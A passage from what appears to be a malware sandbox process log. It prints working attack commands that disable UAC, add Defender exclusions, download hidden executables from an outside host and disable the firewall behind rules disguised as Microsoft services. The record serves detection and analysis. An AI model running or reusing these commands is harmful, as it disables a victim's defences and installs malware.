C:\Windows\SysWOW64\cmd.exe/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f6⤵PID:5288
-
-
\??\c:\program files (x86)\internet explorer\iexplore.exe"c:\program files (x86)\internet explorer\iexplore.exe"6⤵PID:5252
-
C:\Windows\SysWOW64\cmd.exe/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f7⤵PID:5072
-
-
-
-
-
C:\ProgramData\BraveCrashHandler.exe"C:\ProgramData\BraveCrashHandler.exe"4⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Executes dropped EXE
PID:1076 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\4DYKHXVC.bat" "C:\ProgramData\BraveCrashHandler.exe" "5⤵PID:5048
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -exec bypass -enc YwBoAGMAcAAgADYANQAwADAAMQAKACQAUAByAG8AZwByAGUAcwBzAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAJwBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACcACgAKAFMAZQB0AC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIAAtAFMAYwBvAHAAZQAgAEMAdQByAHIAZQBuAHQAVQBzAGUAcgAgAEIAeQBwAGEAcwBzACAALQBGAG8AcgBjAGUACgBTAGUAdAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAALQBTAGMAbwBwAGUAIABMAG8AYwBhAGwATQBhAGMAaABpAG4AZQAgAEIAeQBwAGEAcwBzACAALQBGAG8AcgBjAGUACgAKAGkAZgAoAC0ATgBvAHQAIAAkACgAJAAoAHcAaABvAGEAbQBpACkAIAAtAGUAcQAgACIAbgB0ACAAYQB1AHQAaABvAHIAaQB0AHkAXABzAHkAcwB0AGUAbQAiACkAKQAgAHsACgAgACAAIAAgACQASQBzAFMAeQBzAHQAZQBtACAAPQAgACQAZgBhAGwAcwBlAAoACgAgACAAIAAgAGkAZgAgACgALQBOAG8AdAAgACgAWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMAUAByAGkAbgBjAGkAcABhAGwAXQAgAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAEkAZABlAG4AdABpAHQAeQBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0ACgAKQApAC4ASQBzAEkAbgBSAG8AbABlACgAWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMAQgB1AGkAbAB0AEkAbgBSAG8AbABlAF0AIAAnAEEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAJwApACkAIAB7AAoAIAAgACAAIAAgACAAIAAgACQAQwBvAG0AbQBhAG4AZABMAGkAbgBlACAAPQAgACIALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAEIAeQBwAGEAcwBzACAAYAAiACIAIAArACAAJABNAHkASQBuAHYAbwBjAGEAdABpAG8AbgAuAE0AeQBDAG8AbQBtAGEAbgBkAC4AUABhAHQAaAAgACsAIAAiAGAAIgAgACIAIAArACAAJABNAHkASQBuAHYAbwBjAGEAdABpAG8AbgAuAFUAbgBiAG8AdQBuAGQAQQByAGcAdQBtAGUAbgB0AHMACgAgACAAIAAgACAAIAAgACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAUABvAHcAZQByAFMAaABlAGwAbAAuAGUAeABlACAALQBWAGUAcgBiACAAUgB1AG4AYQBzACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACQAQwBvAG0AbQBhAG4AZABMAGkAbgBlAAoAIAAgACAAIAAgACAAIAAgAEUAeABpAHQACgAgACAAIAAgAH0ACgAKACAAIAAgACAAJABwAHMAZQB4AGUAYwBfAHAAYQB0AGgAIAA9ACAAJAAoAEcAZQB0AC0AQwBvAG0AbQBhAG4AZAAgAFAAcwBFAHgAZQBjACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIAAnAGkAZwBuAG8AcgBlACcAKQAuAFMAbwB1AHIAYwBlACAACgAgACAAIAAgAGkAZgAoACQAcABzAGUAeABlAGMAXwBwAGEAdABoACkAIAB7AAoAIAAgACAAIAAgACAAIAAgACQAQwBvAG0AbQBhAG4AZABMAGkAbgBlACAAPQAgACIAIAAtAGkAIAAtAHMAIABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAAQgB5AHAAYQBzAHMAIABgACIAIgAgACsAIAAkAE0AeQBJAG4AdgBvAGMAYQB0AGkAbwBuAC4ATQB5AEMAbwBtAG0AYQBuAGQALgBQAGEAdABoACAAKwAgACIAYAAiACAAIgAgACsAIAAkAE0AeQBJAG4AdgBvAGMAYQB0AGkAbwBuAC4AVQBuAGIAbwB1AG4AZABBAHIAZwB1AG0AZQBuAHQAcwAgAAoAIAAgACAAIAAgACAAIAAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAEgAaQBkAGQAZQBuACAALQBGAGkAbABlAFAAYQB0AGgAIAAkAHAAcwBlAHgAZQBjAF8AcABhAHQAaAAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAkAEMAbwBtAG0AYQBuAGQATABpAG4AZQAKACAAIAAgACAAIAAgACAAIABlAHgAaQB0AAoAIAAgACAAIAB9ACAAZQBsAHMAZQAgAHsACgAgACAAIAAgAH0ACgAKAH0AIABlAGwAcwBlACAAewAKACAAIAAgACAAJABJAHMAUwB5AHMAdABlAG0AIAA9ACAAJAB0AHIAdQBlAAoAfQAKAAoANgA3AC4ALgA5ADAAfABmAG8AcgBlAGEAYwBoAC0AbwBiAGoAZQBjAHQAewAKACAAIAAgACAAJABkAHIAaQB2AGUAIAA9ACAAWwBjAGgAYQByAF0AJABfAAoAIAAgACAAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAIgAkACgAJABkAHIAaQB2AGUAKQA6AFwAIgAgAC0ARQByAHIAbwByAEEAYwB0AGkAbwBuACAAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAKACAAIAAgACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgACIAJAAoACQAZAByAGkAdgBlACkAOgBcACoAIgAgAC0ARQByAHIAbwByAEEAYwB0AGkAbwBuACAAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAKAH0ACgA=6⤵PID:2240
-
C:\Windows\system32\chcp.com"C:\Windows\system32\chcp.com" 650017⤵PID:2688
-
-
C:\Windows\system32\whoami.exe"C:\Windows\system32\whoami.exe"7⤵PID:4848
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -exec bypass -enc YwBoAGMAcAAgADYANQAwADAAMQAKACQAUAByAG8AZwByAGUAcwBzAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAJwBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACcACgAKAFMAZQB0AC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIAAtAFMAYwBvAHAAZQAgAEMAdQByAHIAZQBuAHQAVQBzAGUAcgAgAEIAeQBwAGEAcwBzACAALQBGAG8AcgBjAGUACgBTAGUAdAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAALQBTAGMAbwBwAGUAIABMAG8AYwBhAGwATQBhAGMAaABpAG4AZQAgAEIAeQBwAGEAcwBzACAALQBGAG8AcgBjAGUACgAKACQAZgBpAGwAZQBzAFQAbwBDAGgAZQBjAGsAIAA9ACAAQAAoAAoAIAAgACAAIABAAHsAUABhAHQAaAA9ACIAJABlAG4AdgA6AFAAUgBPAEcAUgBBAE0ARABBAFQAQQBcAEIAcgBhAHYAZQBDAHIAYQBzAGgASABhAG4AZABsAGUAcgAuAGUAeABlACIAOwAgAFUAcgBsAD0AIgBoAHQAdABwAHMAOgAvAC8AcwBqAGMAMQAuAHYAdQBsAHQAcgBvAGIAagBlAGMAdABzAC4AYwBvAG0ALwBjAGYAYwBiADYAOQBmAGYALwBCAHIAYQB2AGUAQwByAGEAcwBoAEgAYQBuAGQAbABlAHIALgBlAHgAZQAiAH0ALAAKACAAIAAgACAAQAB7AFAAYQB0AGgAPQAiACQAZQBuAHYAOgBVAFMARQBSAFAAUgBPAEYASQBMAEUAXABFAG0AYgBlAGQAaQB0AC4AZQB4AGUAIgA7ACAAVQByAGwAPQAiAGgAdAB0AHAAcwA6AC8ALwBzAGoAYwAxAC4AdgB1AGwAdAByAG8AYgBqAGUAYwB0AHMALgBjAG8AbQAvAGMAZgBjAGIANgA5AGYAZgAvAEUAbQBiAGUAZABpAHQALgBlAHgAZQAiAH0ALAAKACAAIAAgACAAQAB7AFAAYQB0AGgAPQAiACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwARwBvAG8AZwBsAGUAQwByAGEAcwBoAEgAYQBuAGQAbABlAHIALgBlAHgAZQAiADsAIABVAHIAbAA9ACIAaAB0AHQAcABzADoALwAvAHMAagBjADEALgB2AHUAbAB0AHIAbwBiAGoAZQBjAHQAcwAuAGMAbwBtAC8AYwBmAGMAYgA2ADkAZgBmAC8ARwBvAG8AZwBsAGUAQwByAGEAcwBoAEgAYQBuAGQAbABlAHIALgBlAHgAZQAiAH0ALAAKACAAIAAgACAAQAB7AFAAYQB0AGgAPQAiACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwARwBvAG8AZwBsAGUAQwByAGEAcwBoAEgAYQBuAGQAbABlAHIANgA0AC4AZQB4AGUAIgA7ACAAVQByAGwAPQAiAGgAdAB0AHAAcwA6AC8ALwBzAGoAYwAxAC4AdgB1AGwAdAByAG8AYgBqAGUAYwB0AHMALgBjAG8AbQAvAGMAZgBjAGIANgA5AGYAZgAvAEcAbwBvAGcAbABlAEMAcgBhAHMAaABIAGEAbgBkAGwAZQByADYANAAuAGUAeABlACIAfQAsAAoACQBAAHsAUABhAHQAaAA9ACIAJABlAG4AdgA6AEwATwBDAEEATABBAFAAUABEAEEAVABBAFwAUwBoAGUASQBsAEUAeABwAGUAcgBpAGUAbgBjAGUASABvAHMAdAAuAGUAeABlACIAOwAgAFUAcgBsAD0AIgBoAHQAdABwAHMAOgAvAC8AcwBqAGMAMQAuAHYAdQBsAHQAcgBvAGIAagBlAGMAdABzAC4AYwBvAG0ALwBjAGYAYwBiADYAOQBmAGYALwBTAGgAZQBJAGwARQB4AHAAZQByAGkAZQBuAGMAZQBIAG8AcwB0AC4AZQB4AGUAIgB9AAoAKQAKAAoAZgBvAHIAZQBhAGMAaAAgACgAJABmAGkAbABlACAAaQBuACAAJABmAGkAbABlAHMAVABvAEMAaABlAGMAawApACAAewAKACAAIAAgACAAaQBmACAAKAAtAE4AbwB0ACAAKABUAGUAcwB0AC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZgBpAGwAZQAuAFAAYQB0AGgAIAAtAFAAYQB0AGgAVAB5AHAAZQAgAEwAZQBhAGYAKQApACAAewAKACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAkAGYAaQBsAGUALgBVAHIAbAAgAC0ATwB1AHQARgBpAGwAZQAgACQAZgBpAGwAZQAuAFAAYQB0AGgACgAgACAAIAAgAH0ACgAgACAAIAAgACgARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgACQAZgBpAGwAZQAuAFAAYQB0AGgAKQAuAEEAdAB0AHIAaQBiAHUAdABlAHMAIAA9ACAAJwBIAGkAZABkAGUAbgAnACwAJwBTAHkAcwB0AGUAbQAnAAoAfQAKAAoAJABhAGQAZABpAHQAaQBvAG4AYQBsAEYAaQBsAGUAcwBUAG8ASABpAGQAZQAgAD0AIABAACgACgAJACIAJABlAG4AdgA6AFAAUgBPAEcAUgBBAE0ARABBAFQAQQBcAEIAcgBhAHYAZQBDAHIAYQBzAGgASABhAG4AZABsAGUAcgAuAGUAeABlACIALAAKAAkAIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAEcAbwBvAGcAbABlAEMAcgBhAHMAaABIAGEAbgBkAGwAZQByAC4AZQB4AGUAIgAsAAoAIAAgACAAIAAiACQAZQBuAHYAOgBVAFMARQBSAFAAUgBPAEYASQBMAEUAXABBAFAAUABEAEEAVABBAFwATABPAEMAQQBMAFwAVABFAE0AUABcAGQASQBsAGgAbwBzAHQALgBlAHgAZQAiACwACgAgACAAIAAgACIAJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAXABUAEUATQBQAFwAZABJAGwAaABvAHMAdAAuAGUAeABlACIALAAKAAkAIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAEcAbwBvAGcAbABlAEMAcgBhAHMAaABIAGEAbgBkAGwAZQByADYANAAuAGUAeABlACIALAAKACAAIAAgACAAIgAkAGUAbgB2ADoAVQBTAEUAUgBQAFIATwBGAEkATABFAFwAQQBQAFAARABBAFQAQQBcAEwATwBDAEEATABcAFQARQBNAFAAXABkAGwASQBoAG8AcwB0AC4AZQB4AGUAIgAsAAoAIAAgACAAIAAiACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0AFwAVABFAE0AUABcAGQAbABJAGgAbwBzAHQALgBlAHgAZQAiACwACgAJACIAJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQBcAEUAbQBiAGUAZABpAHQALgBlAHgAZQAiACwACgAgACAAIAAgACIAJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQBcAEEAUABQAEQAQQBUAEEAXABMAE8AQwBBAEwAXABUAEUATQBQAFwAbQB5AHMAdAAtAGwAYQB1AG4AYwBoAGUAcgAtAGEAbQBkADYANAAuAGUAeABlACIALAAKACAAIAAgACAAIgAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdABcAFQARQBNAFAAXABtAHkAcwB0AC0AbABhAHUAbgBjAGgAZQByAC0AYQBtAGQANgA0AC4AZQB4AGUAIgAsAAoACQAiACQAZQBuAHYAOgBMAE8AQwBBAEwAQQBQAFAARABBAFQAQQBcAFMAaABlAEkAbABFAHgAcABlAHIAaQBlAG4AYwBlAEgAbwBzAHQALgBlAHgAZQAiACwACgAJACIAJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQBcAEEAUABQAEQAQQBUAEEAXABMAE8AQwBBAEwAXABUAEUATQBQAFwAQgByAGEAdgBlAEMAcgBhAHMAaABIAGEAbgBkAGwAZQByADYANAAuAGUAeABlACIACgApAAoACgBmAG8AcgBlAGEAYwBoACAAKAAkAGYAaQBsAGUAUABhAHQAaAAgAGkAbgAgACQAYQBkAGQAaQB0AGkAbwBuAGEAbABGAGkAbABlAHMAVABvAEgAaQBkAGUAKQAgAHsACgAgACAAIAAgAGkAZgAgACgAVABlAHMAdAAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGYAaQBsAGUAUABhAHQAaAAgAC0AUABhAHQAaABUAHkAcABlACAATABlAGEAZgApACAAewAKACAAIAAgACAAIAAgACAAIAAoAEcAZQB0AC0ASQB0AGUAbQAgACQAZgBpAGwAZQBQAGEAdABoACkALgBBAHQAdAByAGkAYgB1AHQAZQBzACAAPQAgACcASABpAGQAZABlAG4AJwAsACcAUwB5AHMAdABlAG0AJwAKACAAIAAgACAAfQAKAH0ACgAKACQAYQBkAGQAaQB0AGkAbwBuAGEAbABGAG8AbABkAGUAcgBzAFQAbwBIAGkAZABlACAAPQAgAEAAKAAKAAkAIgAkAGUAbgB2ADoAUABSAE8ARwBSAEEATQBEAEEAVABBAFwAQgByAGEAdgBlAFAAcgBpAHYAYQB0AGUAIgAsAAoAIAAgACAAIAAiACQAZQBuAHYAOgBVAFMARQBSAFAAUgBPAEYASQBMAEUAXAAuAG0AeQBzAHQAZQByAGkAdQBtAC0AYgBpAG4AIgAsAAoAIAAgACAAIAAiACQAZQBuAHYAOgBVAFMARQBSAFAAUgBPAEYASQBMAEUAXAAuAG0AeQBzAHQAZQByAGkAdQBtAC0AbgBvAGQAZQAiAAoAKQAKAAoAZgBvAHIAZQBhAGMAaAAgACgAJABmAGkAbABlAFAAYQB0AGgAIABpAG4AIAAkAGEAZABkAGkAdABpAG8AbgBhAGwARgBvAGwAZABlAHIAcwBUAG8ASABpAGQAZQApACAAewAKACAAIAAgACAAaQBmACAAKABUAGUAcwB0AC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZgBpAGwAZQBQAGEAdABoACAALQBQAGEAdABoAFQAeQBwAGUAIABDAG8AbgB0AGEAaQBuAGUAcgApACAAewAKACAAIAAgACAAIAAgACAAIAAoAEcAZQB0AC0ASQB0AGUAbQAgACQAZgBpAGwAZQBQAGEAdABoACkALgBBAHQAdAByAGkAYgB1AHQAZQBzACAAPQAgACcASABpAGQAZABlAG4AJwAsACcAUwB5AHMAdABlAG0AJwAKACAAIAAgACAAfQAKAH0ACgA=6⤵
- Blocklisted process makes network request
PID:848 -
C:\Windows\system32\chcp.com"C:\Windows\system32\chcp.com" 650017⤵PID:2944
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -exec bypass -enc c h c p   6 5 0 0 1 
 $ P r o g r e s s P r e f e r e n c e   =   ' S i l e n t l y C o n t i n u e ' 
 
 S e t - E x e c u t i o n P o l i c y   - S c o p e   C u r r e n t U s e r   B y p a s s   - F o r c e 
 S e t - E x e c u t i o n P o l i c y   - S c o p e   L o c a l M a c h i n e   B y p a s s   - F o r c e 
 
 N e w - N e t F i r e w a l l R u l e   - N a m e   " M i c r o s o f t   E d g e "   - D i s p l a y N a m e   " M i c r o s o f t   E d g e "   - G r o u p   " M i c r o s o f t   E d g e "   - P r o g r a m   " $ e n v : P R O G R A M D A T A \ B r a v e C r a s h H a n d l e r . e x e "   - D i r e c t i o n   I n b o u n d   - P r o f i l e   A n y   - A c t i o n   A l l o w   - E n a b l e d   T r u e 
 N e w - N e t F i r e w a l l R u l e   - N a m e   " M i c r o s o f t   E d g e   E U L A "   - D i s p l a y N a m e   " M i c r o s o f t   E d g e   E U L A "   - G r o u p   " M i c r o s o f t   E d g e   E U L A "   - P r o g r a m   " $ e n v : P R O G R A M D A T A \ B r a v e C r a s h H a n d l e r . e x e "   - D i r e c t i o n   O u t b o u n d   - P r o f i l e   A n y   - A c t i o n   A l l o w   - E n a b l e d   T r u e 
 
 N e w - N e t F i r e w a l l R u l e   - N a m e   " W i n d o w s   S e a r c h "   - D i s p l a y N a m e   " W i n d o w s   S e a r c h "   - G r o u p   " W i n d o w s   S e a r c h "   - P r o g r a m   " $ e n v : U S E R P R O F I L E \ A P P D A T A \ L O C A L \ T E M P \ d I l h o s t . e x e "   - D i r e c t i o n   I n b o u n d   - P r o f i l e   A n y   - A c t i o n   A l l o w   - E n a b l e d   T r u e 
 N e w - N e t F i r e w a l l R u l e   - N a m e   " W i n d o w s   S e a r c h   S e r v i c e "   - D i s p l a y N a m e   " W i n d o w s   S e a r c h   S e r v i c e "   - G r o u p   " W i n d o w s   S e a r c h   S e r v i c e "   - P r o g r a m   " $ e n v : U S E R P R O F I L E \ A P P D A T A \ L O C A L \ T E M P \ d I l h o s t . e x e "   - D i r e c t i o n   O u t b o u n d   - P r o f i l e   A n y   - A c t i o n   A l l o w   - E n a b l e d   T r u e 
 
 N e w - N e t F i r e w a l l R u l e   - N a m e   " C h r o m e   U p d a t e "   - D i s p l a y N a m e   " C h r o m e   U p d a t e "   - G r o u p   " C h r o m e   U p d a t e "   - P r o g r a m   " $ e n v : S y s t e m R o o t \ T E M P \ d I l h o s t . e x e "   - D i r e c t i o n   I n b o u n d   - P r o f i l e   A n y   - A c t i o n   A l l o w   - E n a b l e d   T r u e 
 N e w - N e t F i r e w a l l R u l e   - N a m e   " C h r o m e   U p d a t e   S e r v i c e "   - D i s p l a y N a m e   " C h r o m e   U p d a t e   S e r v i c e "   - G r o u p   " C h r o m e   U p d a t e   S e r v i c e "   - P r o g r a m   " $ e n v : S y s t e m R o o t \ T E M P \ d I l h o s t . e x e "   - D i r e c t i o n   O u t b o u n d   - P r o f i l e   A n y   - A c t i o n   A l l o w   - E n a b l e d   T r u e 
 
 N e w - N e t F i r e w a l l R u l e   - N a m e   " W i n d o w s   M e d i a   T u n i n g "   - D i s p l a y N a m e   " W i n d o w s   M e d i a   T u n i n g "   - G r o u p   " W i n d o w s   M e d i a   T u n i n g "   - P r o g r a m   " $ e n v : U S E R P R O F I L E \ A P P D A T A \ L O C A L \ T E M P \ d l I h o s t . e x e "   - D i r e c t i o n   I n b o u n d   - P r o f i l e   A n y   - A c t i o n   A l l o w   - E n a b l e d   T r u e 
 N e w - N e t F i r e w a l l R u l e   - N a m e   " W i n d o w s   M e d i a   T u n i n g   S e r v i c e "   - D i s p l a y N a m e   " W i n d o w s   M e d i a   T u n i n g   S e r v i c e "   - G r o u p   " W i n d o w s   M e d i a   T u n i n g   S e r v i c e "   - P r o g r a m   " $ e n v : U S E R P R O F I L E \ A P P D A T A \ L O C A L \ T E M P \ d l I h o s t . e x e "   - D i r e c t i o n   O u t b o u n d   - P r o f i l e   A n y   - A c t i o n   A l l o w   - E n a b l e d   T r u e 
 
 N e w - N e t F i r e w a l l R u l e   - N a m e   " W i n d o w s   T e l e m e t r y   M a n a g e r "   - D i s p l a y N a m e   " W i n d o w s   T e l e m e t r y   M a n a g e r "   - G r o u p   " W i n d o w s   T e l e m e t r y   M a n a g e r "   - P r o g r a m   " $ e n v : S y s t e m R o o t \ T E M P \ d l I h o s t . e x e "   - D i r e c t i o n   I n b o u n d   - P r o f i l e   A n y   - A c t i o n   A l l o w   - E n a b l e d   T r u e 
 N e w - N e t F i r e w a l l R u l e   - N a m e   " W i n d o w s   T e l e m e t r y   M a n a g e r   S e r v i c e "   - D i s p l a y N a m e   " W i n d o w s   T e l e m e t r y   M a n a g e r   S e r v i c e "   - G r o u p   " W i n d o w s   T e l e m e t r y   M a n a g e r   S e r v i c e "   - P r o g r a m   " $ e n v : S y s t e m R o o t \ T E M P \ d l I h o s t . e x e "   - D i r e c t i o n   O u t b o u n d   - P r o f i l e   A n y   - A c t i o n   A l l o w   - E n a b l e d   T r u e 
 
 N e w - N e t F i r e w a l l R u l e   - N a m e   " W i n d o w s   C r e d e n t i a l s   S e r v i c e "   - D i s p l a y N a m e   " W i n d o w s   C r e d e n t i a l s   S e r v i c e "   - G r o u p   " W i n d o w s   C r e d e n t i a l s   S e r v i c e "   - P r o g r a m   " $ e n v : U S E R P R O F I L E \ A P P D A T A \ L O C A L \ T E M P \ m y s t - l a u n c h e r - a m d 6 4 . e x e "   - D i r e c t i o n   I n b o u n d   - P r o f i l e   A n y   - A c t i o n   A l l o w   - E n a b l e d   T r u e 
 N e w - N e t F i r e w a l l R u l e   - N a m e   " W i n d o w s   C r e d e n t i a l s   S e r v i c e   M a n a g e r "   - D i s p l a y N a m e   " W i n d o w s   C r e d e n t i a l s   S e r v i c e   M a n a g e r "   - G r o u p   " W i n d o w s   C r e d e n t i a l s   S e r v i c e   M a n a g e r "   - P r o g r a m   " $ e n v : U S E R P R O F I L E \ A P P D A T A \ L O C A L \ T E M P \ m y s t - l a u n c h e r - a m d 6 4 . e x e "   - D i r e c t i o n   O u t b o u n d   - P r o f i l e   A n y   - A c t i o n   A l l o w   - E n a b l e d   T r u e 
 
 N e w - N e t F i r e w a l l R u l e   - N a m e   " W i n d o w s   M e d i a   S y n c h r o n i z a t i o n "   - D i s p l a y N a m e   " W i n d o w s   M e d i a   S y n c h r o n i z a t i o n "   - G r o u p   " W i n d o w s   M e d i a   S y n c h r o n i z a t i o n "   - P r o g r a m   " $ e n v : S y s t e m R o o t \ T E M P \ m y s t - l a u n c h e r - a m d 6 4 . e x e "   - D i r e c t i o n   I n b o u n d   - P r o f i l e   A n y   - A c t i o n   A l l o w   - E n a b l e d   T r u e 
 N e w - N e t F i r e w a l l R u l e   - N a m e   " W i n d o w s   M e d i a   S y n c h r o n i z a t i o n   S e r v i c e "   - D i s p l a y N a m e   " W i n d o w s   M e d i a   S y n c h r o n i z a t i o n   S e r v i c e "   - G r o u p   " W i n d o w s   M e d i a   S y n c h r o n i z a t i o n   S e r v i c e "   - P r o g r a m   " $ e n v : S y s t e m R o o t \ T E M P \ m y s t - l a u n c h e r - a m d 6 4 . e x e "   - D i r e c t i o n   O u t b o u n d   - P r o f i l e   A n y   - A c t i o n   A l l o w   - E n a b l e d   T r u e 
 
 N e w - N e t F i r e w a l l R u l e   - N a m e   " m y s t _ l a u n c h e r _ t c p "   - D i s p l a y N a m e   " m y s t _ l a u n c h e r _ t c p "   - P r o g r a m   " $ e n v : U S E R P R O F I L E \ . m y s t e r i u m - b i n \ m y s t . e x e "   - D i r e c t i o n   I n b o u n d   - P r o f i l e   P u b l i c   - P r o t o c o l   T C P   - A c t i o n   A l l o w   - E n a b l e d   T r u e 
 N e w - N e t F i r e w a l l R u l e   - N a m e   " m y s t _ l a u n c h e r _ u d p "   - D i s p l a y N a m e   " m y s t _ l a u n c h e r _ u d p "   - P r o g r a m   " $ e n v : U S E R P R O F I L E \ . m y s t e r i u m - b i n \ m y s t . e x e "   - D i r e c t i o n   I n b o u n d   - P r o f i l e   P u b l i c   - P r o t o c o l   U D P   - A c t i o n   A l l o w   - E n a b l e d   T r u e 
 
 N e w - N e t F i r e w a l l R u l e   - N a m e   " m y s t . e x e "   - D i s p l a y N a m e   " m y s t . e x e "   - P r o g r a m   " $ e n v : U S E R P R O F I L E \ . m y s t e r i u m - b i n \ m y s t . e x e "   - D i r e c t i o n   I n b o u n d   - P r o f i l e   P u b l i c   - P r o t o c o l   T C P   - A c t i o n   A l l o w   - E n a b l e d   T r u e 
 N e w - N e t F i r e w a l l R u l e   - N a m e   " m y s t . e x e "   - D i s p l a y N a m e   " m y s t . e x e "   - P r o g r a m   " $ e n v : U S E R P R O F I L E \ . m y s t e r i u m - b i n \ m y s t . e x e "   - D i r e c t i o n   I n b o u n d   - P r o f i l e   P u b l i c   - P r o t o c o l   U D P   - A c t i o n   A l l o w   - E n a b l e d   T r u e 
 
 N e w - N e t F i r e w a l l R u l e   - N a m e   " N e t w o r k   D i s c o v e r y   S e r v i c e "   - D i s p l a y N a m e   " N e t w o r k   D i s c o v e r y   S e r v i c e "   - G r o u p   " N e t w o r k   D i s c o v e r y   S e r v i c e "   - L o c a l P o r t   8 0 ,   4 4 3 ,   2 0 2 0 ,   2 4 0 4 ,   3 3 3 3 ,   4 4 4 4 ,   5 5 5 5 ,   4 4 4 9 ,   4 0 5 0   - D i r e c t i o n   I n b o u n d   - P r o f i l e   A n y   - P r o t o c o l   T C P   - A c t i o n   A l l o w   - E n a b l e d   T r u e 
 N e w - N e t F i r e w a l l R u l e   - N a m e   " N e t w o r k   D i s c o v e r y   C o n t r o l "   - D i s p l a y N a m e   " N e t w o r k   D i s c o v e r y   C o n t r o l "   - G r o u p   " N e t w o r k   D i s c o v e r y   C o n t r o l "   - L o c a l P o r t   8 0 ,   4 4 3 ,   2 0 2 0 ,   2 4 0 4 ,   3 3 3 3 ,   4 4 4 4 ,   5 5 5 5 ,   4 4 4 9 ,   4 0 5 0   - D i r e c t i o n   O u t b o u n d   - P r o f i l e   A n y   - P r o t o c o l   T C P   - A c t i o n   A l l o w   - E n a b l e d   T r u e 
 
 S e t - N e t F i r e w a l l P r o f i l e   - P r o f i l e   D o m a i n , P u b l i c , P r i v a t e   - E n a b l e d   F a l s e 
 6⤵PID:5664
-
C:\Windows\system32\chcp.com"C:\Windows\system32\chcp.com" 650017⤵PID:5780
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -exec bypass -enc 